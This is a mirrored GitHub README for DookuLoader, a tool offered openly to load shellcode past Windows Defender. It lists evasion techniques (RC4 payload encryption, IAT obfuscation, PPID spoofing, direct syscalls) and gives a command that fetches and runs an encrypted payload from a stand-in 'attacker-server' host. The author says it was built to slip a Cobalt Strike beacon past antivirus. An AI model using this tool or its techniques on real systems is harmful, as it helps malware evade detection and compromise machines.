Coder Social home page Coder Social logo

dookuloader's Introduction

DookuLoader

DookuLoader is a low level shellcode loader to bypass Windows Defender, created by @rottaj>.


Features

  • RC4 Encryption: Employs the RC4 decryption algorithm to encrypted payloads, making them harder to detect in memory.
  • Custom WinAPI Functions: Custom implementations of GetProcAddress and GetModuleHandle functions, with string stacks.
  • IAT Obfuscation: Employs Import Address Table (IAT) obfuscation techniques to evade detection.
  • PPID Spoofing: Hides execution trace by spoofing the Parent Process ID (PPID) of the injected process.
  • Direct Syscalls: Leverages direct syscalls to bypass WinAPI hooks and interact with the Windows kernel directly.

Installation

git clone https://github.com/rottaj/DookuLoader.git
cd DookuLoader
make;

Run Payload

.\dooku.exe -url "http://attacker-server/rc4-encrypted-payload.bin" 

Encrypt Payload

.\dooku.exe -encrypt "raw-payload.bin" 

Contributing

I am not a 1337 C programmer by any means. This is something I hacked together to get a Cobalt Strike beacon past Windows Defender. If you see anything gross or want to improve this tool, create a pull request or message me at [email protected].

License

This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer

Use this software responsibly and only in environments where you have legal permission.
The author of this tool is not responsible for any misuse or damages caused.





Note: The use of this tool for malicious purposes is illegal and unethical. Always ensure that you have explicit permission to use this tool in any environment.

dookuloader's People

Contributors

rottaj avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar QZ avatar

Watchers

 avatar

Forkers

xiaoccao fcccode

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.